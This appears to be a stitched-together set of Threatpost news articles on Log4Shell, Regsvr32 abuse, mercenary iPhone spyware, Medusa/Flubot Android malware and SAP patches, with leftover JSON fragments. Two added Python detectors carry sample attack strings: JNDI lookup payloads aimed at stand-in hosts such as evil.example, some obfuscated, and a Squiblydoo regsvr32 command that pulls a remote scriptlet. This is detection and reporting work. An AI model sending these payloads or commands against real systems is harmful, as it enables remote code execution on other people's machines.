relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. 
If Java is being used in production systems, IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * [**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. 
[BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201cWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. 
The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * 
[VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
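The detection tools listed above work at the application or host level; the same attack strings can also be hunted for in web-server access logs, provided the scanner undoes the obfuscation attackers wrap around them. The following Python scanner is an added example written for this page (it is not Threatpost’s code, nor the Huntress or Cybereason tool). It normalizes Log4j’s own lookup syntax, the `${lower:x}` and `${upper:x}` lookups and the `${...:-default}` default-value form, strips URL encoding, and then reports any `jndi:` lookup that survives together with the callback host. The log lines are constructed samples; the IP addresses and hostnames in them are documentation placeholders.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookups in web-server logs, including
obfuscated variants built from Log4j's own lookup syntax.

Added example for this page; not code from Threatpost or from any tool named
in the article. Log lines below are constructed samples using documentation
address ranges and the reserved .example / .invalid names.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...}: a lookup body with no nested '${' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup left after de-obfuscation; group 2 is the attacker's callback host.
JNDI_LOOKUP = re.compile(
    r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^\s/\x22\x27}]+)",
    re.IGNORECASE,
)


def _unwrap(match: re.Match) -> str:
    """Collapse one obfuscation wrapper to the text Log4j would produce.

    Handles the three wrappers seen in the wild:
      ${x:-default}  -> default   (default-value syntax, e.g. ${::-j}, ${env:NOPE:-j})
      ${lower:X}     -> x
      ${upper:X}     -> X
    Anything else (including the jndi lookup being hunted) is left intact.
    """
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    return match.group(0)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode (two layers) and repeatedly resolve innermost wrappers."""
    current = unquote(unquote(text))
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_unwrap, current)
        if resolved == current:
            break
        current = resolved
    return current


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, surviving jndi lookup, callback host) per hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((number, match.group(0), match.group(2)))
    return hits


# Constructed access-log lines (not real traffic). Lines 2-5 carry payloads:
# plain, lower:-wrapped, ${::-x} letter-by-letter, and URL-encoded env:-default.
# Line 6 is a benign lookup that must not be reported.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:rmi}://evil.example:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.10 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.evil.example/a}"',
    '203.0.113.11 - - [10/Dec/2021:14:02:15 +0000] '
    '"GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.5%2Fa%7D HTTP/1.1" 200 10 "-" "-"',
    '203.0.113.12 - - [10/Dec/2021:14:02:16 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "-"',
]


def scan_sample() -> List[Tuple[int, str, str]]:
    return scan(SAMPLE_LOG)


if __name__ == "__main__":
    for number, lookup, host in scan_sample():
        print(f"line {number}: {lookup}  callback host -> {host}")
```

The resolver only collapses the wrappers it recognizes and leaves everything else in place, so the `jndi:` lookup itself is never consumed and an unknown lookup such as `${date:yyyy}` does not produce a false positive. Feed it the raw request line and all headers you log (User-Agent, Referer, X-Forwarded-For) rather than the path alone, since the attacks reported above arrive through whichever field the application ends up logging.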
*Source: Threatpost, “Log4Shell Is Spawning Even Nastier Mutations”, published 2021-12-13 (CVE-2021-44228): <https://threatpost.com/apache-log4j-log4shell-mutations/176962/>*

# Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware

*Threatpost, published 2022-02-09. Source: <https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/>*

A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.

LOLBins are legitimate, native utilities used daily in various computing environments, which cybercriminals use to evade detection by blending in with normal activity. In this case, Regsvr32 is a Microsoft-signed command-line utility in Windows that registers and unregisters libraries such as .DLL and .OCX files. Registering a .DLL adds information to the central directory (the Registry) so that the library can be used by Windows and shared among programs.

This long reach is catnip to cyberattackers, who can abuse the utility via the [“Squiblydoo” technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.

“Threat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,” they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). “This method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.”

## **The .OCX Connection**

Malicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents.
As a class, .OCX files contain ActiveX controls: code blocks that Microsoft developed to enable applications to perform specific functions, such as displaying a calendar.

“The Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,” researchers warned. “During our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files…97 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.”

Most of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffixes, they added, which are macro-enabled formats. During an attack, the embedded macros typically download a malicious payload from a URL and execute it.

Similarly, some campaigns use Microsoft Word, Rich Text Format or Composite Document files (.DOC, .DOCX or .DOCM) embedded with malicious macros, according to Uptycs.

## **Identifying Suspicious regsvr32 Executions**

Because Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. However, researchers noted that security teams can monitor for two specific behaviors in order to track its activity:

 * Look for parent/child process relationships where Regsvr32 is executed with a parent process of Microsoft Word or Microsoft Excel; and
 * Look for Regsvr32 executions that load scrobj.dll, the library that executes a COM scriptlet.
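Both behaviors above map directly onto process-creation and image-load telemetry. The following is an added example written for this page, not Uptycs’ or Threatpost’s code: a small Python detector that runs over constructed Sysmon-style events (Event ID 1 for process creation, Event ID 7 for image load; the field names, paths and sample values are assumptions) and implements the two rules. It goes slightly beyond the article by also flagging the Squiblydoo command-line shape documented in the MITRE CAR analytic linked above, `regsvr32 /s /u /i:<url> scrobj.dll`, and by treating PowerPoint and Outlook as Office parents alongside Word and Excel.

```python
"""Detect the two Regsvr32 abuse patter ns described above.

Added example for this page; not Uptycs or Threatpost code. Events are
constructed Sysmon-style records (ID 1 = process creation, ID 7 = image load);
the paths, hostnames and the extra Office parents are assumptions, not page content.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office parents that should never spawn regsvr32.exe in normal use. The
# article names Word and Excel; PowerPoint and Outlook are added as an
# assumption, since the same macro-laden document delivery applies to them.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Squiblydoo shape from MITRE CAR-2019-04-003: regsvr32 /s /u /i:<url> scrobj.dll
SQUIBLYDOO_URL = re.compile(r"(?:^|\s)[/-]i:\s*https?://", re.IGNORECASE)


@dataclass
class Event:
    """Subset of Sysmon fields; fields not relevant to an event type stay empty."""
    event_id: int           # 1 = process creation, 7 = image load
    image: str              # path of the running process
    parent_image: str = ""  # event_id 1 only
    command_line: str = ""  # event_id 1 only
    image_loaded: str = ""  # event_id 7 only


def basename(path: str) -> str:
    """Case-folded file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Dict[str, str]]:
    """Return one finding per matched rule; a single event may match several."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        if basename(ev.image) != "regsvr32.exe":
            continue
        if ev.event_id == 1:
            # Rule 1: regsvr32 spawned by an Office application.
            if basename(ev.parent_image) in OFFICE_PARENTS:
                findings.append({"rule": "office_parent", "evidence": ev.parent_image})
            # Rule 2a: Squiblydoo on the command line (scrobj.dll or /i:<url>).
            cl = ev.command_line
            if "scrobj.dll" in cl.lower() or SQUIBLYDOO_URL.search(cl):
                findings.append({"rule": "squiblydoo_cmdline", "evidence": cl})
        elif ev.event_id == 7 and basename(ev.image_loaded) == "scrobj.dll":
            # Rule 2b: regsvr32 loading the COM scriptlet host.
            findings.append({"rule": "scrobj_load", "evidence": ev.image_loaded})
    return findings


# Constructed sample telemetry (not real events). The first two are benign:
# an installer registering its own DLL, and a user-launched .OCX registration.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\msiexec.exe",
          r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    Event(1, r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\explorer.exe",
          r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\control.ocx"),
    Event(1, r"C:\Windows\SysWOW64\regsvr32.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
          r"regsvr32.exe /s /u /i:https://example.invalid/payload.sct scrobj.dll"),
    Event(7, r"C:\Windows\SysWOW64\regsvr32.exe",
          image_loaded=r"C:\Windows\SysWOW64\scrobj.dll"),
]


def run_sample() -> List[Dict[str, str]]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for finding in run_sample():
        print(f"{finding['rule']:<20} {finding['evidence']}")
```

The office-parent rule fires on any regsvr32 child of an Office process regardless of arguments; it is the cheaper signal and the one that also catches the .OCX registrations launched from macro documents described above. The two scrobj.dll rules need command-line and DLL-load telemetry, so confirm that your sensor actually records image loads before relying on them.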
"2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. 
Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others’ devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>), another zero-click iMessage exploit.

BlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero’s Samuel Groß called at the time a “tightly sandboxed” service responsible for “almost all” of the parsing of untrusted data in iMessages. ForcedEntry circumvented BlastDoor by targeting Apple’s image-rendering library instead: a sophisticated attack that was effective against iOS, macOS and watchOS devices.

## QuaDream Got in on the Fun

QuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one of the targets, who was living in London at the time.

According to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters’ sources for QuaDream’s background were Israeli corporate records and two people familiar with the business.

Its 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users’ microphones and cameras in real time. This type of powerful spyware gives its operators access to their targets’ email, photos, texts, contacts and instant messages, regardless of the end-to-end encryption offered by services such as WhatsApp, Telegram or Signal: encryption in transit does nothing once the endpoint itself is compromised.

## There’s So Much Talent Out There, Unfortunately

Citizen Lab security researcher Bill Marczak, who’s been studying both companies’ tools, told Reuters that the zero-click capability of QuaDream’s flagship product – called REIGN – seems “on par” with NSO’s Pegasus spyware.

As Reuters noted, security researchers at Google’s Project Zero have called ForcedEntry [“one of the most technically sophisticated exploits”](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they’ve ever captured, an assessment echoed by Citizen Lab director Ronald Deibert.

On Monday, he pointed to Project Zero’s “very thorough” analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.

“That spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,” he told Threatpost via email.

## Israeli Police Linked to Widespread Pegasus Spying

A related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.

“CEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister’s relatives, all were police targets, having their phones hacked by NSO’s spyware, prior to any investigation even opening and without any judicial authorization,” Calcalist reported.

Pegasus was also recently found on the devices of Finland’s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.

## QuaDream: Less Known But Just as Powerful

According to QuaDream’s brochures for the REIGN “Premium Collection,” its malware tools offer similar capabilities to Pegasus, including “real-time call recordings,” “camera activation – front and back,” and “microphone activation,” as Reuters reported.

The outlet’s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream’s first clients also allegedly include the Singaporean government. The firm also apparently made a pitch to the Indonesian government, though Reuters couldn’t determine whether Indonesia bought in.

Its prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, “exclusive of maintenance costs,” though two people familiar with REIGN’s sales told Reuters that the price for REIGN “was typically higher.”

## How Vast *Is* the Spyware Market?

Kudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company in their social-media posts.

John Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. “Every intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,” he said via email. “China, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.”

The fact that there are more spyware-makers than just NSO Group is no shocker.

That was made clear in December by Meta, Facebook’s parent company, which kicked six alleged spy-for-hire “cyber-mercenaries” [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.

Mike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given “an entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.”

There are “almost certainly” exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven’t yet come to light “because they are used sparingly and only against high-value targets.”

# Medusa Malware Joins Flubot’s Android Distribution Network

*Threatpost, published 2022-02-07. Source: <https://threatpost.com/medusa-malware-flubot-android-distribution/178258/>*

Flubot, the Android spyware that’s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.

That’s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.

The Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a “missed package delivery” app or a fake version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. It then sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.

The malicious implant also sends additional text messages to the infected device’s contact list, which allows it [to “go viral”](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) – like the flu.

Apparently, Medusa likes the cut of Flubot’s jib: “Our threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,” ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>).
“In less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.”

And that’s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.

Unlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users in Canada, Turkey and the United States.

“After targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,” ThreatFabric researchers noted. “Powered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.”

## **Medusa Bursts on the Scene**

First discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user’s device, including capabilities for keylogging, banking-trojan activity, and audio and video streaming. It has also received several updates and improved its obfuscation techniques as it hops on Flubot’s infrastructure coattails, researchers said.

For one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim’s behalf, with the help of the Android Accessibility Service.

“By abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim’s device,” researchers noted. “A command like ‘fillfocus’ allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.”

Accessibility-event logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.

“Having all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,” according to ThreatFabric. “Moreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.”

The following snippet shows the code that collects information about the active window by walking its nodes:

[Image: code snippet that walks the active window’s accessibility node tree](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)

Source: ThreatFabric.

Further, in examining Medusa’s back-end panels, researchers observed the malware’s operators marking banking apps with a “BANK” tag, to control/log the input fields.

“This means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,” they warned.

The command-and-control (C2) server can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.

## **Flubot Evolves Its Capabilities**

The researchers also noticed that the addition of Medusa to the mix hasn’t slowed down Flubot’s own development. They explained that it now has a “novel capability never seen before in mobile banking malware.”

To wit: in version 5.4, Flubot picked up the ability to abuse the “Notification Direct Reply” feature of Android, which allows the malware to reply directly to push notifications from targeted applications on a victim’s device. The user sees none of this activity, so Flubot can intercept and answer notifications unnoticed, opening the door to defeating two-factor authentication and more, researchers said.

“Every minute the malware sends the statistics to the C2 about the notifications received,” they explained. “As a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content…We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim’s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.”

Another potential abuse of this functionality could be to respond to social-application interactions with “notifications” containing malicious phishing links.

“Considering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,” according to ThreatFabric.

# SAP Log4Shell Fixes and December 2021 Patch Tuesday

*Threatpost, December 15, 2021.*

SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) – the critical vulnerability in the Apache Log4j Java-based logging library that’s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.

As of yesterday, Patch Tuesday, the German software maker reported that it had already patched 20 of those apps, and that it was still feverishly working on fixes for 12.
SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping it on a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besidea Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) \u200b\u200b21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. 
